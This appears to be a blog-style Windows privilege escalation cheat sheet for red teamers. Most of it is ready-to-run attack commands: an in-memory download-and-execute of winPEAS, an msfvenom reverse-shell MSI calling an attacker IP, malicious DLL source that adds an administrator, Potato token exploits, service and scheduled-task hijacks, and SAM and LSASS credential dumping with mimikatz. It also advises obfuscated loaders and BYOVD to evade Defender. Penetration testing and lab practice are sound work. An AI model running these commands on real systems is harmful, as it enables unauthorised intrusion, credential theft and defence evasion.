Windows Privilege Escalation Cheat Sheet 2026: Every Technique That Works

Windows privilege escalation is one of the most critical skills in offensive security. You land on a box as a low-privileged user, and your job isn’t done until you have SYSTEM. This cheat sheet covers every technique that actually works in 2026 — with real commands, the right tools, and notes on which Windows versions each technique applies to.

Bookmark it. You’ll use it.

Why Windows PrivEsc Is Different From Linux

Linux privilege escalation has patterns: SUID binaries, sudo misconfigs, writable cron jobs, kernel exploits. Clean and predictable.

Windows is messier. The attack surface is enormous — services, tokens, registry, COM objects, scheduled tasks, Active Directory, credential stores. Windows also has a richer privilege token system, a legacy architecture with decades of backward-compatibility decisions baked in, and enterprise environments where admins make mistakes at scale.

The upside: there are more paths to SYSTEM on Windows. The downside: you need to know where to look.

Step One: Enumerate Everything

Don’t guess. Run your enumeration tooling first, read the output, then pick your attack path.

WinPEAS

The gold standard for automated Windows enumeration.

# Download and run in-memory
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')

# Or run the .exe
.\winPEASx64.exe
.\winPEASx64.exe quiet

Download: https://github.com/peass-ng/PEASS-ng/releases

WinPEAS highlights findings in red/yellow. Start there.

Seatbelt

Security-focused enumeration from GhostPack. Better for specific checks than broad sweeps.

.\Seatbelt.exe -group=all
.\Seatbelt.exe TokenPrivileges
.\Seatbelt.exe CredGuard
.\Seatbelt.exe WindowsDefender

Download: https://github.com/GhostPack/Seatbelt

PowerUp

PowerSploit’s privesc script. Focused on service and config misconfigs.

Import-Module .\PowerUp.ps1
Invoke-AllChecks

Download: https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

Manual Enumeration Commands

Don’t rely entirely on tools. Know the manual approach.

# System info
systeminfo
hostname
whoami /all
whoami /priv

# Network
ipconfig /all
netstat -ano
route print

# Users and groups
net user
net localgroup administrators
net localgroup

# Running processes and services
tasklist /svc
sc query type= all state= all
wmic service list brief

# Installed software
wmic product get name,version
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

# Scheduled tasks
schtasks /query /fo LIST /v

# Environment variables
set

Service Misconfigurations

Services running as SYSTEM are attractive targets. If you can control what a service executes, you get SYSTEM.

Unquoted Service Paths

When a service binary path contains spaces and isn’t quoted, Windows tries multiple locations before finding the real binary. If you can write to an intermediate directory, you win.

Enumerate unquoted paths:

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Or with PowerUp:

Get-UnquotedService

Example vulnerable path:

C:\Program Files\Vulnerable App\service.exe

Windows will try:

1. C:\Program.exe
2. C:\Program Files\Vulnerable.exe
3. C:\Program Files\Vulnerable App\service.exe

If you can write to C:\Program Files\, drop a Vulnerable.exe there and restart the service.

sc stop VulnerableService
sc start VulnerableService

Weak Service Permissions

If you have write permissions to a service binary, replace it. If you have SERVICE_CHANGE_CONFIG permissions, reconfigure it to run your binary.

# Check permissions with PowerUp
Get-ModifiableServiceFile
Get-ModifiableService

# Manual check with accesschk (Sysinternals)
.\accesschk.exe /accepteula -uwcqv "Authenticated Users" *
.\accesschk.exe /accepteula -uwcqv "Everyone" *

If you have SERVICE_CHANGE_CONFIG:

sc config VulnService binpath= "C:\Windows\Temp\shell.exe"
sc stop VulnService
sc start VulnService

Or use PowerUp:

Invoke-ServiceAbuse -Name VulnService -UserName attacker -Password Password123

DLL Hijacking in Services

Services loading DLLs from writable directories are vulnerable. If you can plant a malicious DLL before the legitimate one is found, the service loads yours.

Find DLL hijacking candidates:

# Use Process Monitor (Procmon) — filter for "NAME NOT FOUND" on DLL loads
# Or use PowerUp
Find-PathDLLHijack

Create a malicious DLL:

// malicious.c — compile as DLL
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /c net localgroup administrators attacker /add");
    }
    return TRUE;
}

# Compile with mingw
x86_64-w64-mingw32-gcc -shared -o malicious.dll malicious.c

Plant the DLL and trigger a service restart.

Token Impersonation and Potato Attacks

Windows access tokens represent a user’s security context. If you have certain token privileges, you can impersonate SYSTEM.

The Key Privileges

SeImpersonatePrivilege       — Impersonate a client after authentication
SeAssignPrimaryTokenPrivilege — Replace a process-level token
SeCreateTokenPrivilege       — Create a token (rarely exploitable directly)

Check your current privileges:

whoami /priv

These privileges are commonly held by service accounts — IIS AppPool users, SQL Server service accounts, LocalService/NetworkService. If you’ve compromised one, Potato attacks are usually your fastest path.

JuicyPotato

Works on Windows Server 2008 – 2019, Windows 7 – 10 (pre-KB2999226 era or where DCOM is accessible).

.\JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c net localgroup administrators attacker /add" -t *

You may need to specify a CLSID for your target OS. List: https://github.com/ohpe/juicy-potato/tree/master/CLSID

Download: https://github.com/ohpe/juicy-potato/releases

PrintSpoofer

Targets Windows 10, Server 2016/2019. Uses the Print Spooler named pipe trick.

.\PrintSpoofer.exe -i -c cmd
.\PrintSpoofer.exe -c "net localgroup administrators attacker /add"

Download: https://github.com/itm4n/PrintSpoofer

GodPotato

The current go-to for Windows Server 2012 – 2022, Windows 8 – 11. Broader compatibility than JuicyPotato or PrintSpoofer.

.\GodPotato.exe -cmd "net localgroup administrators attacker /add"
.\GodPotato.exe -cmd "cmd /c whoami > C:\Windows\Temp\whoami.txt"

Download: https://github.com/BeichenDream/GodPotato

Which Potato to use:

Registry Attacks

The Windows registry holds configuration, credentials, and autorun paths. Multiple privesc vectors live here.

AlwaysInstallElevated

If both these registry keys are set to 1, any user can install MSI packages with SYSTEM privileges.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If both return 0x1:

# Generate malicious MSI on Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f msi -o malicious.msi

# Install on target
msiexec /quiet /qn /i malicious.msi

PowerUp automates this:

Write-UserAddMSI

Stored Credentials in Registry

Credentials sometimes get stored in plaintext or weakly obfuscated in the registry.

# Autologon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Look for DefaultPassword, DefaultUserName, DefaultDomainName

# PuTTY stored sessions
reg query HKCU\Software\SimonTatham\PuTTY\Sessions /s

# VNC passwords (DES encrypted, trivially decrypted)
reg query HKCU\Software\RealVNC\WinVNC4 /v Password
reg query HKLM\SOFTWARE\RealVNC\WinVNC4 /v Password

Autorun Paths

Programs configured to run at startup may execute from writable locations.

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

If the path points to a writable directory, replace or plant a binary. Wait for a privileged user to log in, or force a reboot if you can.

PowerUp:

Get-RegistryAlwaysInstallElevated
Get-RegistryAutoLogon

Scheduled Tasks

Task Scheduler runs tasks in user, admin, or SYSTEM contexts. Writable task binaries or directories are exploitable.

Find Writable Task Binaries

schtasks /query /fo LIST /v | findstr /i "task name\|run as user\|task to run"

Then check permissions on each task’s binary:

.\accesschk.exe /accepteula -qvw "C:\path\to\task\binary.exe"
icacls "C:\path\to\task\binary.exe"

If writable by your current user, replace it:

copy malicious.exe "C:\path\to\task\binary.exe"

Wait for the task to fire, or trigger it manually:

schtasks /run /tn "VulnerableTask"

Creating Tasks with Elevated Context

If you have SeCreateScheduledTask or the machine is misconfigured:

schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\Temp\shell.exe" /sc onlogon /ru SYSTEM
schtasks /run /tn "WindowsUpdate"

Password Mining

Credentials are everywhere on a Windows box if you know where to dig.

SAM + SYSTEM Dump

The SAM database holds local account password hashes. You need SYSTEM to read it — but if you already have SYSTEM (or an admin shell), you can extract and crack them.

# Save the hives
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
reg save HKLM\SECURITY C:\Temp\SECURITY

# Dump on Kali with impacket
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL

Volume Shadow Copy bypass (if SAM is locked):

vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Temp\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\SYSTEM

LSASS Dump

LSASS holds credentials in memory — NTLM hashes, Kerberos tickets, sometimes cleartext passwords.

Mimikatz (classic):

.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
sekurlsa::wdigest
lsadump::sam

Remote LSASS dump (no touching disk):

# Dump to file, exfil, run Mimikatz offline
.\mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit

Pypykatz (Python alternative, run on Kali):

pypykatz lsa minidump lsass.dmp

Comsvcs.dll dump (living off the land):

$lsass = Get-Process lsass | Select-Object -ExpandProperty Id
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass C:\Temp\lsass.dmp full

Note: Windows Defender detects most of these. Use obfuscated loaders or BYOVD techniques in hardened environments.

Windows Credential Manager

Stored browser credentials, network passwords, generic credentials.

cmdkey /list

Extract with Mimikatz:

vault::cred
vault::list

Or with PowerShell:

[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]::new().RetrieveAll() | % { $_.RetrievePassword(); $_ }

PowerShell History

Users type credentials into terminals. The history stays on disk.

# Current user
Get-Content (Get-PSReadLineOption).HistorySavePath

# All users (if admin)
Get-ChildItem C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Also check:

# Old-style cmd history (current session only)
doskey /history

# IIS config (may contain app credentials)
type C:\inetpub\wwwroot\web.config
findstr /si password C:\inetpub\*.config

# Common credential locations
findstr /si password C:\Users\*.txt
findstr /si password C:\Users\*.xml
findstr /si password C:\Users\*.ini

Active Directory PrivEsc Preview

If the machine is domain-joined, local admin may be just the beginning. A few quick wins for domain escalation:

AS-REP Roasting — accounts without Kerberos pre-auth required are vulnerable to offline password cracking.

GetNPUsers.py DOMAIN/ -usersfile users.txt -format hashcat -outputfile asrep.txt
hashcat -m 18200 asrep.txt rockyou.txt

Kerberoasting — any domain user can request service tickets for SPNs. Crack the hash offline.

.\Rubeus.exe kerberoast /outfile:kerberoast.txt

hashcat -m 13100 kerberoast.txt rockyou.txt

Full AD privesc coverage is coming in a dedicated article — AS-REP, Kerberoasting, ACL abuse, DCSync, Golden/Silver tickets, and more.

Quick Reference Table

Practice Environment

The best way to learn this isn’t reading — it’s doing.

Dedicated VPS for your own lab:

• Vultr — Deploy a Windows Server VM for a few dollars/hour. Spin it up, misconfigure it deliberately, practice your escalation paths, destroy it when done.
• DigitalOcean — Clean Windows droplets with predictable pricing. Good for persistent lab environments.

CTF Platforms with Windows PrivEsc content:

• HackTheBox — Bounty , Jeeves , Nest , Resolute are excellent
• TryHackMe — Windows PrivEsc room covers most of these techniques in a guided format

The difference between someone who reads this cheat sheet and someone who uses it is hands-on time. Build the lab. Break it repeatedly.

Need Red Team Content for Your Blog or Security Team?

CipherWrite delivers battle-tested cybersecurity articles written by working red teamers. No fluff, no filler — technical content that actually helps.

Browse CipherWrite Packages →